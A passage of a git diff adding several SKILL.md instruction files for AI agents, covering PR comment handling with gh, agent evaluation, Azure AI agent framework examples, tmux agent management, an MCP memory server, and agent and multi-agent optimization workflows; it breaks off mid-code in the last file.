+Efficiently address PR review comments or issue feedback using the GitHub CLI (`gh`). This skill ensures all feedback is addressed systematically.
+
+## Prerequisites
+
+Ensure `gh` is authenticated.
+
+```bash
+gh auth status
+```
+
+If not logged in, run `gh auth login`.
+
+## Workflow
+
+### 1. Inspect Comments
+
+Fetch the comments for the current branch's PR.
+
+```bash
+gh pr view --comments
+```
+
+Or use a custom script if available to list threads.
+
+### 2. Categorize and Plan
+
+- List the comments and review threads.
+- Propose a fix for each.
+- **Wait for user confirmation** on which comments to address first if there are many.
+
+### 3. Apply Fixes
+
+Apply the code changes for the selected comments.
+
+### 4. Respond to Comments
+
+Once fixed, respond to the threads as resolved.
+
+```bash
+gh pr comment --body "Addressed in latest commit."
+```
+
+## Common Mistakes
+
+- **Applying fixes without understanding context**: Always read the surrounding code of a comment.
+- **Not verifying auth**: Check `gh auth status` before starting.
diff --git a/web-app/public/skills/agent-evaluation/SKILL.md b/web-app/public/skills/agent-evaluation/SKILL.md
new file mode 100644
index 00000000..964c6184
--- /dev/null
+++ b/web-app/public/skills/agent-evaluation/SKILL.md
@@ -0,0 +1,64 @@
+---
+name: agent-evaluation
+description: "Testing and benchmarking LLM agents including behavioral testing, capability assessment, reliability metrics, and production monitoring—where even top agents achieve less than 50% on real-world benchmarks Use when: agent testing, agent evaluation, benchmark agents, agent reliability, test agent."
+source: vibeship-spawner-skills (Apache 2.0)
+---
+
+# Agent Evaluation
+
+You're a quality engineer who has seen agents that aced benchmarks fail spectacularly in
+production. You've learned that evaluating LLM agents is fundamentally different from
+testing traditional software—the same input can produce different outputs, and "correct"
+often has no single answer.
+
+You've built evaluation frameworks that catch issues before production: behavioral regression
+tests, capability assessments, and reliability metrics. You understand that the goal isn't
+100% test pass rate—it
+
+## Capabilities
+
+- agent-testing
+- benchmark-design
+- capability-assessment
+- reliability-metrics
+- regression-testing
+
+## Requirements
+
+- testing-fundamentals
+- llm-fundamentals
+
+## Patterns
+
+### Statistical Test Evaluation
+
+Run tests multiple times and analyze result distributions
+
+### Behavioral Contract Testing
+
+Define and test agent behavioral invariants
+
+### Adversarial Testing
+
+Actively try to break agent behavior
+
+## Anti-Patterns
+
+### ❌ Single-Run Testing
+
+### ❌ Only Happy Path Tests
+
+### ❌ Output String Matching
+
+## ⚠️ Sharp Edges
+
+| Issue | Severity | Solution |
+|-------|----------|----------|
+| Agent scores well on benchmarks but fails in production | high | // Bridge benchmark and production evaluation |
+| Same test passes sometimes, fails other times | high | // Handle flaky tests in LLM agent evaluation |
+| Agent optimized for metric, not actual task | medium | // Multi-dimensional evaluation to prevent gaming |
+| Test data accidentally used in training or prompts | critical | // Prevent data leakage in agent evaluation |
+
+## Related Skills
+
+Works well with: `multi-agent-orchestration`, `agent-communication`, `autonomous-agents`
diff --git a/web-app/public/skills/agent-framework-azure-ai-py/SKILL.md b/web-app/public/skills/agent-framework-azure-ai-py/SKILL.md
new file mode 100644
index 00000000..74da0813
--- /dev/null
+++ b/web-app/public/skills/agent-framework-azure-ai-py/SKILL.md
@@ -0,0 +1,333 @@
+---
+name: agent-framework-azure-ai-py
+description: Build Azure AI Foundry agents using the Microsoft Agent Framework Python SDK (agent-framework-azure-ai). Use when creating persistent agents with AzureAIAgentsProvider, using hosted tools (code interpreter, file search, web search), integrating MCP servers, managing conversation threads, or implementing streaming responses. Covers function tools, structured outputs, and multi-tool agents.
+package: agent-framework-azure-ai
+---
+
+# Agent Framework Azure Hosted Agents
+
+Build persistent agents on Azure AI Foundry using the Microsoft Agent Framework Python SDK.
+
+## Architecture
+
+```
+User Query → AzureAIAgentsProvider → Azure AI Agent Service (Persistent)
+ ↓
+ Agent.run() / Agent.run_stream()
+ ↓
+ Tools: Functions | Hosted (Code/Search/Web) | MCP
+ ↓
+ AgentThread (conversation persistence)
+```
+
+## Installation
+
+```bash
+# Full framework (recommended)
+pip install agent-framework --pre
+
+# Or Azure-specific package only
+pip install agent-framework-azure-ai --pre
+```
+
+## Environment Variables
+
+```bash
+export AZURE_AI_PROJECT_ENDPOINT="https://.services.ai.azure.com/api/projects/"
+export AZURE_AI_MODEL_DEPLOYMENT_NAME="gpt-4o-mini"
+export BING_CONNECTION_ID="your-bing-connection-id" # For web search
+```
+
+## Authentication
+
+```python
+from azure.identity.aio import AzureCliCredential, DefaultAzureCredential
+
+# Development
+credential = AzureCliCredential()
+
+# Production
+credential = DefaultAzureCredential()
+```
+
+## Core Workflow
+
+### Basic Agent
+
+```python
+import asyncio
+from agent_framework.azure import AzureAIAgentsProvider
+from azure.identity.aio import AzureCliCredential
+
+async def main():
+ async with (
+ AzureCliCredential() as credential,
+ AzureAIAgentsProvider(credential=credential) as provider,
+ ):
+ agent = await provider.create_agent(
+ name="MyAgent",
+ instructions="You are a helpful assistant.",
+ )
+
+ result = await agent.run("Hello!")
+ print(result.text)
+
+asyncio.run(main())
+```
+
+### Agent with Function Tools
+
+```python
+from typing import Annotated
+from pydantic import Field
+from agent_framework.azure import AzureAIAgentsProvider
+from azure.identity.aio import AzureCliCredential
+
+def get_weather(
+ location: Annotated[str, Field(description="City name to get weather for")],
+) -> str:
+ """Get the current weather for a location."""
+ return f"Weather in {location}: 72°F, sunny"
+
+def get_current_time() -> str:
+ """Get the current UTC time."""
+ from datetime import datetime, timezone
+ return datetime.now(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
+
+async def main():
+ async with (
+ AzureCliCredential() as credential,
+ AzureAIAgentsProvider(credential=credential) as provider,
+ ):
+ agent = await provider.create_agent(
+ name="WeatherAgent",
+ instructions="You help with weather and time queries.",
+ tools=[get_weather, get_current_time], # Pass functions directly
+ )
+
+ result = await agent.run("What's the weather in Seattle?")
+ print(result.text)
+```
+
+### Agent with Hosted Tools
+
+```python
+from agent_framework import (
+ HostedCodeInterpreterTool,
+ HostedFileSearchTool,
+ HostedWebSearchTool,
+)
+from agent_framework.azure import AzureAIAgentsProvider
+from azure.identity.aio import AzureCliCredential
+
+async def main():
+ async with (
+ AzureCliCredential() as credential,
+ AzureAIAgentsProvider(credential=credential) as provider,
+ ):
+ agent = await provider.create_agent(
+ name="MultiToolAgent",
+ instructions="You can execute code, search files, and search the web.",
+ tools=[
+ HostedCodeInterpreterTool(),
+ HostedWebSearchTool(name="Bing"),
+ ],
+ )
+
+ result = await agent.run("Calculate the factorial of 20 in Python")
+ print(result.text)
+```
+
+### Streaming Responses
+
+```python
+async def main():
+ async with (
+ AzureCliCredential() as credential,
+ AzureAIAgentsProvider(credential=credential) as provider,
+ ):
+ agent = await provider.create_agent(
+ name="StreamingAgent",
+ instructions="You are a helpful assistant.",
+ )
+
+ print("Agent: ", end="", flush=True)
+ async for chunk in agent.run_stream("Tell me a short story"):
+ if chunk.text:
+ print(chunk.text, end="", flush=True)
+ print()
+```
+
+### Conversation Threads
+
+```python
+from agent_framework.azure import AzureAIAgentsProvider
+from azure.identity.aio import AzureCliCredential
+
+async def main():
+ async with (
+ AzureCliCredential() as credential,
+ AzureAIAgentsProvider(credential=credential) as provider,
+ ):
+ agent = await provider.create_agent(
+ name="ChatAgent",
+ instructions="You are a helpful assistant.",
+ tools=[get_weather],
+ )
+
+ # Create thread for conversation persistence
+ thread = agent.get_new_thread()
+
+ # First turn
+ result1 = await agent.run("What's the weather in Seattle?", thread=thread)
+ print(f"Agent: {result1.text}")
+
+ # Second turn - context is maintained
+ result2 = await agent.run("What about Portland?", thread=thread)
+ print(f"Agent: {result2.text}")
+
+ # Save thread ID for later resumption
+ print(f"Conversation ID: {thread.conversation_id}")
+```
+
+### Structured Outputs
+
+```python
+from pydantic import BaseModel, ConfigDict
+from agent_framework.azure import AzureAIAgentsProvider
+from azure.identity.aio import AzureCliCredential
+
+class WeatherResponse(BaseModel):
+ model_config = ConfigDict(extra="forbid")
+
+ location: str
+ temperature: float
+ unit: str
+ conditions: str
+
+async def main():
+ async with (
+ AzureCliCredential() as credential,
+ AzureAIAgentsProvider(credential=credential) as provider,
+ ):
+ agent = await provider.create_agent(
+ name="StructuredAgent",
+ instructions="Provide weather information in structured format.",
+ response_format=WeatherResponse,
+ )
+
+ result = await agent.run("Weather in Seattle?")
+ weather = WeatherResponse.model_validate_json(result.text)
+ print(f"{weather.location}: {weather.temperature}°{weather.unit}")
+```
+
+## Provider Methods
+
+| Method | Description |
+|--------|-------------|
+| `create_agent()` | Create new agent on Azure AI service |
+| `get_agent(agent_id)` | Retrieve existing agent by ID |
+| `as_agent(sdk_agent)` | Wrap SDK Agent object (no HTTP call) |
+
+## Hosted Tools Quick Reference
+
+| Tool | Import | Purpose |
+|------|--------|---------|
+| `HostedCodeInterpreterTool` | `from agent_framework import HostedCodeInterpreterTool` | Execute Python code |
+| `HostedFileSearchTool` | `from agent_framework import HostedFileSearchTool` | Search vector stores |
+| `HostedWebSearchTool` | `from agent_framework import HostedWebSearchTool` | Bing web search |
+| `HostedMCPTool` | `from agent_framework import HostedMCPTool` | Service-managed MCP |
+| `MCPStreamableHTTPTool` | `from agent_framework import MCPStreamableHTTPTool` | Client-managed MCP |
+
+## Complete Example
+
+```python
+import asyncio
+from typing import Annotated
+from pydantic import BaseModel, Field
+from agent_framework import (
+ HostedCodeInterpreterTool,
+ HostedWebSearchTool,
+ MCPStreamableHTTPTool,
+)
+from agent_framework.azure import AzureAIAgentsProvider
+from azure.identity.aio import AzureCliCredential
+
+
+def get_weather(
+ location: Annotated[str, Field(description="City name")],
+) -> str:
+ """Get weather for a location."""
+ return f"Weather in {location}: 72°F, sunny"
+
+
+class AnalysisResult(BaseModel):
+ summary: str
+ key_findings: list[str]
+ confidence: float
+
+
+async def main():
+ async with (
+ AzureCliCredential() as credential,
+ MCPStreamableHTTPTool(
+ name="Docs MCP",
+ url="https://learn.microsoft.com/api/mcp",
+ ) as mcp_tool,
+ AzureAIAgentsProvider(credential=credential) as provider,
+ ):
+ agent = await provider.create_agent(
+ name="ResearchAssistant",
+ instructions="You are a research assistant with multiple capabilities.",
+ tools=[
+ get_weather,
+ HostedCodeInterpreterTool(),
+ HostedWebSearchTool(name="Bing"),
+ mcp_tool,
+ ],
+ )
+
+ thread = agent.get_new_thread()
+
+ # Non-streaming
+ result = await agent.run(
+ "Search for Python best practices and summarize",
+ thread=thread,
+ )
+ print(f"Response: {result.text}")
+
+ # Streaming
+ print("\nStreaming: ", end="")
+ async for chunk in agent.run_stream("Continue with examples", thread=thread):
+ if chunk.text:
+ print(chunk.text, end="", flush=True)
+ print()
+
+ # Structured output
+ result = await agent.run(
+ "Analyze findings",
+ thread=thread,
+ response_format=AnalysisResult,
+ )
+ analysis = AnalysisResult.model_validate_json(result.text)
+ print(f"\nConfidence: {analysis.confidence}")
+
+
+if __name__ == "__main__":
+ asyncio.run(main())
+```
+
+## Conventions
+
+- Always use async context managers: `async with provider:`
+- Pass functions directly to `tools=` parameter (auto-converted to AIFunction)
+- Use `Annotated[type, Field(description=...)]` for function parameters
+- Use `get_new_thread()` for multi-turn conversations
+- Prefer `HostedMCPTool` for service-managed MCP, `MCPStreamableHTTPTool` for client-managed
+
+## Reference Files
+
+- [references/tools.md](references/tools.md): Detailed hosted tool patterns
+- [references/mcp.md](references/mcp.md): MCP integration (hosted + local)
+- [references/threads.md](references/threads.md): Thread and conversation management
+- [references/advanced.md](references/advanced.md): OpenAPI, citations, structured outputs
diff --git a/web-app/public/skills/agent-manager-skill/SKILL.md b/web-app/public/skills/agent-manager-skill/SKILL.md
new file mode 100644
index 00000000..2660641f
--- /dev/null
+++ b/web-app/public/skills/agent-manager-skill/SKILL.md
@@ -0,0 +1,40 @@
+---
+name: agent-manager-skill
+description: Manage multiple local CLI agents via tmux sessions (start/stop/monitor/assign) with cron-friendly scheduling.
+---
+
+# Agent Manager Skill
+
+## When to use
+
+Use this skill when you need to:
+
+- run multiple local CLI agents in parallel (separate tmux sessions)
+- start/stop agents and tail their logs
+- assign tasks to agents and monitor output
+- schedule recurring agent work (cron)
+
+## Prerequisites
+
+Install `agent-manager-skill` in your workspace:
+
+```bash
+git clone https://github.com/fractalmind-ai/agent-manager-skill.git
+```
+
+## Common commands
+
+```bash
+python3 agent-manager/scripts/main.py doctor
+python3 agent-manager/scripts/main.py list
+python3 agent-manager/scripts/main.py start EMP_0001
+python3 agent-manager/scripts/main.py monitor EMP_0001 --follow
+python3 agent-manager/scripts/main.py assign EMP_0002 <<'EOF'
+Follow teams/fractalmind-ai-maintenance.md Workflow
+EOF
+```
+
+## Notes
+
+- Requires `tmux` and `python3`.
+- Agents are configured under an `agents/` directory (see the repo for examples).
diff --git a/web-app/public/skills/agent-memory-mcp/SKILL.md b/web-app/public/skills/agent-memory-mcp/SKILL.md
new file mode 100644
index 00000000..45d96513
--- /dev/null
+++ b/web-app/public/skills/agent-memory-mcp/SKILL.md
@@ -0,0 +1,82 @@
+---
+name: agent-memory-mcp
+author: Amit Rathiesh
+description: A hybrid memory system that provides persistent, searchable knowledge management for AI agents (Architecture, Patterns, Decisions).
+---
+
+# Agent Memory Skill
+
+This skill provides a persistent, searchable memory bank that automatically syncs with project documentation. It runs as an MCP server to allow reading/writing/searching of long-term memories.
+
+## Prerequisites
+
+- Node.js (v18+)
+
+## Setup
+
+1. **Clone the Repository**:
+ Clone the `agentMemory` project into your agent's workspace or a parallel directory:
+
+ ```bash
+ git clone https://github.com/webzler/agentMemory.git .agent/skills/agent-memory
+ ```
+
+2. **Install Dependencies**:
+
+ ```bash
+ cd .agent/skills/agent-memory
+ npm install
+ npm run compile
+ ```
+
+3. **Start the MCP Server**:
+ Use the helper script to activate the memory bank for your current project:
+
+ ```bash
+ npm run start-server
+ ```
+
+ _Example for current directory:_
+
+ ```bash
+ npm run start-server my-project $(pwd)
+ ```
+
+## Capabilities (MCP Tools)
+
+### `memory_search`
+
+Search for memories by query, type, or tags.
+
+- **Args**: `query` (string), `type?` (string), `tags?` (string[])
+- **Usage**: "Find all authentication patterns" -> `memory_search({ query: "authentication", type: "pattern" })`
+
+### `memory_write`
+
+Record new knowledge or decisions.
+
+- **Args**: `key` (string), `type` (string), `content` (string), `tags?` (string[])
+- **Usage**: "Save this architecture decision" -> `memory_write({ key: "auth-v1", type: "decision", content: "..." })`
+
+### `memory_read`
+
+Retrieve specific memory content by key.
+
+- **Args**: `key` (string)
+- **Usage**: "Get the auth design" -> `memory_read({ key: "auth-v1" })`
+
+### `memory_stats`
+
+View analytics on memory usage.
+
+- **Usage**: "Show memory statistics" -> `memory_stats({})`
+
+## Dashboard
+
+This skill includes a standalone dashboard to visualize memory usage.
+
+```bash
+npm run start-dashboard
+```
+
+Access at: `http://localhost:3333`
diff --git a/web-app/public/skills/agent-memory-systems/SKILL.md b/web-app/public/skills/agent-memory-systems/SKILL.md
new file mode 100644
index 00000000..ee791180
--- /dev/null
+++ b/web-app/public/skills/agent-memory-systems/SKILL.md
@@ -0,0 +1,67 @@
+---
+name: agent-memory-systems
+description: "Memory is the cornerstone of intelligent agents. Without it, every interaction starts from zero. This skill covers the architecture of agent memory: short-term (context window), long-term (vector stores), and the cognitive architectures that organize them. Key insight: Memory isn't just storage - it's retrieval. A million stored facts mean nothing if you can't find the right one. Chunking, embedding, and retrieval strategies determine whether your agent remembers or forgets. The field is fragm"
+source: vibeship-spawner-skills (Apache 2.0)
+---
+
+# Agent Memory Systems
+
+You are a cognitive architect who understands that memory makes agents intelligent.
+You've built memory systems for agents handling millions of interactions. You know
+that the hard part isn't storing - it's retrieving the right memory at the right time.
+
+Your core insight: Memory failures look like intelligence failures. When an agent
+"forgets" or gives inconsistent answers, it's almost always a retrieval problem,
+not a storage problem. You obsess over chunking strategies, embedding quality,
+and
+
+## Capabilities
+
+- agent-memory
+- long-term-memory
+- short-term-memory
+- working-memory
+- episodic-memory
+- semantic-memory
+- procedural-memory
+- memory-retrieval
+- memory-formation
+- memory-decay
+
+## Patterns
+
+### Memory Type Architecture
+
+Choosing the right memory type for different information
+
+### Vector Store Selection Pattern
+
+Choosing the right vector database for your use case
+
+### Chunking Strategy Pattern
+
+Breaking documents into retrievable chunks
+
+## Anti-Patterns
+
+### ❌ Store Everything Forever
+
+### ❌ Chunk Without Testing Retrieval
+
+### ❌ Single Memory Type for All Data
+
+## ⚠️ Sharp Edges
+
+| Issue | Severity | Solution |
+|-------|----------|----------|
+| Issue | critical | ## Contextual Chunking (Anthropic's approach) |
+| Issue | high | ## Test different sizes |
+| Issue | high | ## Always filter by metadata first |
+| Issue | high | ## Add temporal scoring |
+| Issue | medium | ## Detect conflicts on storage |
+| Issue | medium | ## Budget tokens for different memory types |
+| Issue | medium | ## Track embedding model in metadata |
+
+## Related Skills
+
+Works well with: `autonomous-agents`, `multi-agent-orchestration`, `llm-architect`, `agent-tool-builder`
diff --git a/web-app/public/skills/agent-orchestration-improve-agent/SKILL.md b/web-app/public/skills/agent-orchestration-improve-agent/SKILL.md
new file mode 100644
index 00000000..74f211bb
--- /dev/null
+++ b/web-app/public/skills/agent-orchestration-improve-agent/SKILL.md
@@ -0,0 +1,349 @@
+---
+name: agent-orchestration-improve-agent
+description: "Systematic improvement of existing agents through performance analysis, prompt engineering, and continuous iteration."
+---
+
+# Agent Performance Optimization Workflow
+
+Systematic improvement of existing agents through performance analysis, prompt engineering, and continuous iteration.
+
+[Extended thinking: Agent optimization requires a data-driven approach combining performance metrics, user feedback analysis, and advanced prompt engineering techniques. Success depends on systematic evaluation, targeted improvements, and rigorous testing with rollback capabilities for production safety.]
+
+## Use this skill when
+
+- Improving an existing agent's performance or reliability
+- Analyzing failure modes, prompt quality, or tool usage
+- Running structured A/B tests or evaluation suites
+- Designing iterative optimization workflows for agents
+
+## Do not use this skill when
+
+- You are building a brand-new agent from scratch
+- There are no metrics, feedback, or test cases available
+- The task is unrelated to agent performance or prompt quality
+
+## Instructions
+
+1. Establish baseline metrics and collect representative examples.
+2. Identify failure modes and prioritize high-impact fixes.
+3. Apply prompt and workflow improvements with measurable goals.
+4. Validate with tests and roll out changes in controlled stages.
+
+## Safety
+
+- Avoid deploying prompt changes without regression testing.
+- Roll back quickly if quality or safety metrics regress.
+
+## Phase 1: Performance Analysis and Baseline Metrics
+
+Comprehensive analysis of agent performance using context-manager for historical data collection.
+
+### 1.1 Gather Performance Data
+
+```
+Use: context-manager
+Command: analyze-agent-performance $ARGUMENTS --days 30
+```
+
+Collect metrics including:
+
+- Task completion rate (successful vs failed tasks)
+- Response accuracy and factual correctness
+- Tool usage efficiency (correct tools, call frequency)
+- Average response time and token consumption
+- User satisfaction indicators (corrections, retries)
+- Hallucination incidents and error patterns
+
+### 1.2 User Feedback Pattern Analysis
+
+Identify recurring patterns in user interactions:
+
+- **Correction patterns**: Where users consistently modify outputs
+- **Clarification requests**: Common areas of ambiguity
+- **Task abandonment**: Points where users give up
+- **Follow-up questions**: Indicators of incomplete responses
+- **Positive feedback**: Successful patterns to preserve
+
+### 1.3 Failure Mode Classification
+
+Categorize failures by root cause:
+
+- **Instruction misunderstanding**: Role or task confusion
+- **Output format errors**: Structure or formatting issues
+- **Context loss**: Long conversation degradation
+- **Tool misuse**: Incorrect or inefficient tool selection
+- **Constraint violations**: Safety or business rule breaches
+- **Edge case handling**: Unusual input scenarios
+
+### 1.4 Baseline Performance Report
+
+Generate quantitative baseline metrics:
+
+```
+Performance Baseline:
+- Task Success Rate: [X%]
+- Average Corrections per Task: [Y]
+- Tool Call Efficiency: [Z%]
+- User Satisfaction Score: [1-10]
+- Average Response Latency: [Xms]
+- Token Efficiency Ratio: [X:Y]
+```
+
+## Phase 2: Prompt Engineering Improvements
+
+Apply advanced prompt optimization techniques using prompt-engineer agent.
+
+### 2.1 Chain-of-Thought Enhancement
+
+Implement structured reasoning patterns:
+
+```
+Use: prompt-engineer
+Technique: chain-of-thought-optimization
+```
+
+- Add explicit reasoning steps: "Let's approach this step-by-step..."
+- Include self-verification checkpoints: "Before proceeding, verify that..."
+- Implement recursive decomposition for complex tasks
+- Add reasoning trace visibility for debugging
+
+### 2.2 Few-Shot Example Optimization
+
+Curate high-quality examples from successful interactions:
+
+- **Select diverse examples** covering common use cases
+- **Include edge cases** that previously failed
+- **Show both positive and negative examples** with explanations
+- **Order examples** from simple to complex
+- **Annotate examples** with key decision points
+
+Example structure:
+
+```
+Good Example:
+Input: [User request]
+Reasoning: [Step-by-step thought process]
+Output: [Successful response]
+Why this works: [Key success factors]
+
+Bad Example:
+Input: [Similar request]
+Output: [Failed response]
+Why this fails: [Specific issues]
+Correct approach: [Fixed version]
+```
+
+### 2.3 Role Definition Refinement
+
+Strengthen agent identity and capabilities:
+
+- **Core purpose**: Clear, single-sentence mission
+- **Expertise domains**: Specific knowledge areas
+- **Behavioral traits**: Personality and interaction style
+- **Tool proficiency**: Available tools and when to use them
+- **Constraints**: What the agent should NOT do
+- **Success criteria**: How to measure task completion
+
+### 2.4 Constitutional AI Integration
+
+Implement self-correction mechanisms:
+
+```
+Constitutional Principles:
+1. Verify factual accuracy before responding
+2. Self-check for potential biases or harmful content
+3. Validate output format matches requirements
+4. Ensure response completeness
+5. Maintain consistency with previous responses
+```
+
+Add critique-and-revise loops:
+
+- Initial response generation
+- Self-critique against principles
+- Automatic revision if issues detected
+- Final validation before output
+
+### 2.5 Output Format Tuning
+
+Optimize response structure:
+
+- **Structured templates** for common tasks
+- **Dynamic formatting** based on complexity
+- **Progressive disclosure** for detailed information
+- **Markdown optimization** for readability
+- **Code block formatting** with syntax highlighting
+- **Table and list generation** for data presentation
+
+## Phase 3: Testing and Validation
+
+Comprehensive testing framework with A/B comparison.
+
+### 3.1 Test Suite Development
+
+Create representative test scenarios:
+
+```
+Test Categories:
+1. Golden path scenarios (common successful cases)
+2. Previously failed tasks (regression testing)
+3. Edge cases and corner scenarios
+4. Stress tests (complex, multi-step tasks)
+5. Adversarial inputs (potential breaking points)
+6. Cross-domain tasks (combining capabilities)
+```
+
+### 3.2 A/B Testing Framework
+
+Compare original vs improved agent:
+
+```
+Use: parallel-test-runner
+Config:
+ - Agent A: Original version
+ - Agent B: Improved version
+ - Test set: 100 representative tasks
+ - Metrics: Success rate, speed, token usage
+ - Evaluation: Blind human review + automated scoring
+```
+
+Statistical significance testing:
+
+- Minimum sample size: 100 tasks per variant
+- Confidence level: 95% (p < 0.05)
+- Effect size calculation (Cohen's d)
+- Power analysis for future tests
+
+### 3.3 Evaluation Metrics
+
+Comprehensive scoring framework:
+
+**Task-Level Metrics:**
+
+- Completion rate (binary success/failure)
+- Correctness score (0-100% accuracy)
+- Efficiency score (steps taken vs optimal)
+- Tool usage appropriateness
+- Response relevance and completeness
+
+**Quality Metrics:**
+
+- Hallucination rate (factual errors per response)
+- Consistency score (alignment with previous responses)
+- Format compliance (matches specified structure)
+- Safety score (constraint adherence)
+- User satisfaction prediction
+
+**Performance Metrics:**
+
+- Response latency (time to first token)
+- Total generation time
+- Token consumption (input + output)
+- Cost per task (API usage fees)
+- Memory/context efficiency
+
+### 3.4 Human Evaluation Protocol
+
+Structured human review process:
+
+- Blind evaluation (evaluators don't know version)
+- Standardized rubric with clear criteria
+- Multiple evaluators per sample (inter-rater reliability)
+- Qualitative feedback collection
+- Preference ranking (A vs B comparison)
+
+## Phase 4: Version Control and Deployment
+
+Safe rollout with monitoring and rollback capabilities.
+
+### 4.1 Version Management
+
+Systematic versioning strategy:
+
+```
+Version Format: agent-name-v[MAJOR].[MINOR].[PATCH]
+Example: customer-support-v2.3.1
+
+MAJOR: Significant capability changes
+MINOR: Prompt improvements, new examples
+PATCH: Bug fixes, minor adjustments
+```
+
+Maintain version history:
+
+- Git-based prompt storage
+- Changelog with improvement details
+- Performance metrics per version
+- Rollback procedures documented
+
+### 4.2 Staged Rollout
+
+Progressive deployment strategy:
+
+1. **Alpha testing**: Internal team validation (5% traffic)
+2. **Beta testing**: Selected users (20% traffic)
+3. **Canary release**: Gradual increase (20% → 50% → 100%)
+4. **Full deployment**: After success criteria met
+5. **Monitoring period**: 7-day observation window
+
+### 4.3 Rollback Procedures
+
+Quick recovery mechanism:
+
+```
+Rollback Triggers:
+- Success rate drops >10% from baseline
+- Critical errors increase >5%
+- User complaints spike
+- Cost per task increases >20%
+- Safety violations detected
+
+Rollback Process:
+1. Detect issue via monitoring
+2. Alert team immediately
+3. Switch to previous stable version
+4. Analyze root cause
+5. Fix and re-test before retry
+```
+
+### 4.4 Continuous Monitoring
+
+Real-time performance tracking:
+
+- Dashboard with key metrics
+- Anomaly detection alerts
+- User feedback collection
+- Automated regression testing
+- Weekly performance reports
+
+## Success Criteria
+
+Agent improvement is successful when:
+
+- Task success rate improves by ≥15%
+- User corrections decrease by ≥25%
+- No increase in safety violations
+- Response time remains within 10% of baseline
+- Cost per task doesn't increase >5%
+- Positive user feedback increases
+
+## Post-Deployment Review
+
+After 30 days of production use:
+
+1. Analyze accumulated performance data
+2. Compare against baseline and targets
+3. Identify new improvement opportunities
+4. Document lessons learned
+5. Plan next optimization cycle
+
+## Continuous Improvement Cycle
+
+Establish regular improvement cadence:
+
+- **Weekly**: Monitor metrics and collect feedback
+- **Monthly**: Analyze patterns and plan improvements
+- **Quarterly**: Major version updates with new capabilities
+- **Annually**: Strategic review and architecture updates
+
+Remember: Agent optimization is an iterative process. Each cycle builds upon previous learnings, gradually improving performance while maintaining stability and safety.
diff --git a/web-app/public/skills/agent-orchestration-multi-agent-optimize/SKILL.md b/web-app/public/skills/agent-orchestration-multi-agent-optimize/SKILL.md
new file mode 100644
index 00000000..03214ca5
--- /dev/null
+++ b/web-app/public/skills/agent-orchestration-multi-agent-optimize/SKILL.md
@@ -0,0 +1,239 @@
+---
+name: agent-orchestration-multi-agent-optimize
+description: "Optimize multi-agent systems with coordinated profiling, workload distribution, and cost-aware orchestration. Use when improving agent performance, throughput, or reliability."
+---
+
+# Multi-Agent Optimization Toolkit
+
+## Use this skill when
+
+- Improving multi-agent coordination, throughput, or latency
+- Profiling agent workflows to identify bottlenecks
+- Designing orchestration strategies for complex workflows
+- Optimizing cost, context usage, or tool efficiency
+
+## Do not use this skill when
+
+- You only need to tune a single agent prompt
+- There are no measurable metrics or evaluation data
+- The task is unrelated to multi-agent orchestration
+
+## Instructions
+
+1. Establish baseline metrics and target performance goals.
+2. Profile agent workloads and identify coordination bottlenecks.
+3. Apply orchestration changes and cost controls incrementally.
+4. Validate improvements with repeatable tests and rollbacks.
+
+## Safety
+
+- Avoid deploying orchestration changes without regression testing.
+- Roll out changes gradually to prevent system-wide regressions.
+
+## Role: AI-Powered Multi-Agent Performance Engineering Specialist
+
+### Context
+
+The Multi-Agent Optimization Tool is an advanced AI-driven framework designed to holistically improve system performance through intelligent, coordinated agent-based optimization. Leveraging cutting-edge AI orchestration techniques, this tool provides a comprehensive approach to performance engineering across multiple domains.
+
+### Core Capabilities
+
+- Intelligent multi-agent coordination
+- Performance profiling and bottleneck identification
+- Adaptive optimization strategies
+- Cross-domain performance optimization
+- Cost and efficiency tracking
+
+## Arguments Handling
+
+The tool processes optimization arguments with flexible input parameters:
+
+- `$TARGET`: Primary system/application to optimize
+- `$PERFORMANCE_GOALS`: Specific performance metrics and objectives
+- `$OPTIMIZATION_SCOPE`: Depth of optimization (quick-win, comprehensive)
+- `$BUDGET_CONSTRAINTS`: Cost and resource limitations
+- `$QUALITY_METRICS`: Performance quality thresholds
+
+## 1. Multi-Agent Performance Profiling
+
+### Profiling Strategy
+
+- Distributed performance monitoring across system layers
+- Real-time metrics collection and analysis
+- Continuous performance signature tracking
+
+#### Profiling Agents
+
+1. **Database Performance Agent**
+ - Query execution time analysis
+ - Index utilization tracking
+ - Resource consumption monitoring
+
+2. **Application Performance Agent**
+ - CPU and memory profiling
+ - Algorithmic complexity assessment
+ - Concurrency and async operation analysis
+
+3. **Frontend Performance Agent**
+ - Rendering performance metrics
+ - Network request optimization
+ - Core Web Vitals monitoring
+
+### Profiling Code Example
+
+```python
+def multi_agent_profiler(target_system):
+ agents = [
+ DatabasePerformanceAgent(target_system),
+ ApplicationPerformanceAgent(target_system),
+ FrontendPerformanceAgent(target_system)
+ ]
+
+ performance_profile = {}
+ for agent in agents:
+ performance_profile[agent.__class__.__name__] = agent.profile()
+
+ return aggregate_performance_metrics(performance_profile)
+```
+
+## 2. Context Window Optimization
+
+### Optimization Techniques
+
+- Intelligent context compression
+- Semantic relevance filtering
+- Dynamic context window resizing
+- Token budget management
+
+### Context Compression Algorithm
+
+```python
+def compress_context(context, max_tokens=4000):
+ # Semantic compression using embedding-based truncation
+ compressed_context = semantic_truncate(
+ context,
+ max_tokens=max_tokens,
+ importance_threshold=0.7
+ )
+ return compressed_context
+```
+
+## 3. Agent Coordination Efficiency
+
+### Coordination Principles
+
+- Parallel execution design
+- Minimal inter-agent communication overhead
+- Dynamic workload distribution
+- Fault-tolerant agent interactions
+
+### Orchestration Framework
+
+```python
+class MultiAgentOrchestrator:
+ def __init__(self, agents):
+ self.agents = agents
+ self.execution_queue = PriorityQueue()
+ self.performance_tracker = PerformanceTracker()
+
+ def optimize(self, target_system):
+ # Parallel agent execution with coordinated optimization
+ with concurrent.futures.ThreadPoolExecutor() as executor:
+ futures = {
+ executor.submit(agent.optimize, target_system): agent
+ for agent in self.agents
+ }
+
+ for future in concurrent.futures.as_completed(futures):
+ agent = futures[future]
+ result = future.result()
+ self.performance_tracker.log(agent, result)
+```
+
+## 4. Parallel Execution Optimization
+
+### Key Strategies
+
+- Asynchronous agent processing
+- Workload partitioning
+- Dynamic resource allocation
+- Minimal blocking operations
+
+## 5. Cost Optimization Strategies
+
+### LLM Cost Management
+
+- Token usage tracking
+- Adaptive model selection
+- Caching and result reuse
+- Efficient prompt engineering
+
+### Cost Tracking Example
+
+```python
+class CostOptimizer:
+ def __init__(self):
+ self.token_budget = 100000 # Monthly budget
+ self.token_usage = 0
